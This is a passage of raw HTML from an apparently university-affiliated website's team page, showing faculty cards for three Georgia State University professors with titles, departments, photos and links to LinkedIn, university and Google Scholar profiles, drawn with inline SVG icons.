style-980-frameImage style-local-182-c440-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c441\" class=\"h-global-transition-all h-heading style-974 style-local-182-c441 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c441\">\n <!---->\n <!---->\n <h4 class=\"\">Raj Sunderraman</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c442\" class=\"h-text h-text-component style-975 style-local-182-c442 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Associate Chair and Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c443\" class=\"h-text h-text-component style-976 style-local-182-c443 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c444\" class=\"style-981 style-local-182-c444 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?hl=en&user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c445-outer\">\n <div data-colibri-id=\"182-c445\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c445 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c446\" class=\"d-block style-982 style-local-182-c446 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c446-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c446-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c447\" class=\"h-global-transition-all h-heading style-974 style-local-182-c447 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c447\">\n <!---->\n <!---->\n <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c448\" class=\"h-text h-text-component style-975 style-local-182-c448 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Research Associate Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c449\" class=\"h-text h-text-component style-976 style-local-182-c449 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Population Health Sciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c450\" class=\"style-983 style-local-182-c450 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c455-outer\">\n <div data-colibri-id=\"182-c455\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c455 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c456\" class=\"d-block style-973 style-local-182-c456 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c456-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c456-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c457\" class=\"h-global-transition-all h-heading style-974 style-local-182-c457 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c457\">\n <!---->\n <!---->\n <h4 class=\"\">Anu Bourgeois</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c458\" class=\"h-text h-text-component style-975 style-local-182-c458 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c459\" class=\"h-text h-text-component style-976 style-local-182-c459 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c460\" class=\"style-977 style-local-182-c460 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 